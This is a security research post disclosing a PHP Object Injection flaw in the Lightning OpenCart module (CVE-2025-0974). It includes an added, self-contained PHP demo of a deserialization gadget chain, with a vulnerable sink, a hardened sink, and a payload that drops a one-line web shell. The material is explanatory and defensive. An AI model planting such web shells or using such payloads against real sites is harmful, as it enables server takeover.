Research: PHP Object Injection in Lightning OpenCart module

As part of my research into Gadget Chains and PHP Object Injection, I discovered a vulnerability in the Lightning OpenCart module.

POP (Property-Oriented Programming) gadget chains exist in OpenCart 3 and 4 itself, so an Object Injection vulnerability anywhere in an OpenCart installation (here, the injection point in the Lightning module) can be exploited end to end, for example to write arbitrary files or achieve Remote Code Execution.
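The mechanism described above, as an added example that is not part of the original post and is not OpenCart or Lightning code: a constructed gadget class whose `__destruct()` writes a file, the vulnerable `unserialize()` sink beside a hardened one, and the payload an attacker would serialize offline. The class name, property names, file paths and payload are assumptions for illustration only; the actual chain is described in the linked gist.

```php
<?php
// Added illustration of the mechanism, not the OpenCart/Lightning chain from the
// advisory. Class name, property names, file paths and payload are constructed.

// Gadget: a class whose __destruct() performs a file write with data taken from
// its own properties. Real gadgets are found in application or library code
// (cache writers, loggers, template compilers); the attacker only needs the
// class to be loadable when unserialize() runs.
class CacheWriter
{
    public string $path;
    public string $data;

    public function __construct(string $path, string $data)
    {
        $this->path = $path;
        $this->data = $data;
    }

    public function __destruct()
    {
        // Fires when the object is destroyed, including objects that
        // unserialize() built from untrusted input.
        file_put_contents($this->path, $this->data);
    }
}

// Vulnerable sink: unserialize() on attacker-controlled input (cookie, POST
// field, session blob, cached value) with no class restriction.
function vulnerable_sink(string $untrusted): void
{
    $obj = unserialize($untrusted);   // any loadable class can be instantiated
    unset($obj);                      // __destruct() of the gadget runs here
}

// Hardened sink: forbid object instantiation. Serialized objects then arrive
// as __PHP_Incomplete_Class, which has no magic methods, so no gadget fires.
// Better still: use a format that cannot express objects at all, such as JSON.
function hardened_sink(string $untrusted): void
{
    $obj = unserialize($untrusted, ['allowed_classes' => false]);
    if ($obj instanceof __PHP_Incomplete_Class) {
        throw new RuntimeException('refused serialized object in untrusted input');
    }
}

// The attacker builds the payload offline by serializing a gadget instance
// whose properties point at the file and contents they want written.
function build_payload(string $targetPath, string $contents): string
{
    $g = new CacheWriter($targetPath, $contents);
    $payload = serialize($g);
    // Neutralise the local instance so its own destructor writes nothing
    // useful when it goes out of scope.
    $g->path = 'php://memory';
    return $payload;
}

// Demonstration: a web shell dropped through the vulnerable sink, refused by
// the hardened one. The target path is a constructed temp file.
$target  = sys_get_temp_dir() . '/poi_demo_' . getmypid() . '.php';
$payload = build_payload($target, "<?php system(\$_GET['c']); ?>");
echo "payload: $payload\n";

vulnerable_sink($payload);
printf("vulnerable sink: file written = %s\n", file_exists($target) ? 'yes' : 'no');
@unlink($target);

try {
    hardened_sink($payload);
} catch (RuntimeException $e) {
    echo "hardened sink: {$e->getMessage()}\n";
}
printf("hardened sink: file written = %s\n", file_exists($target) ? 'yes' : 'no');
```

Run it with `php poi_demo.php`. The point to take away is that the gadget class is entirely benign on its own; what makes it exploitable is an `unserialize()` call reachable with attacker-controlled bytes plus the class being loadable at that moment, which is why a chain living in OpenCart core can be triggered through an injection point in any module.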

The maintainer was very responsive to the report and addressed the issue quickly. Thanks!

Details: https://gist.github.com/mcdruid/f8153d7d535c0fcba920e83a64953d4e

This was assigned CVE-2025-0974.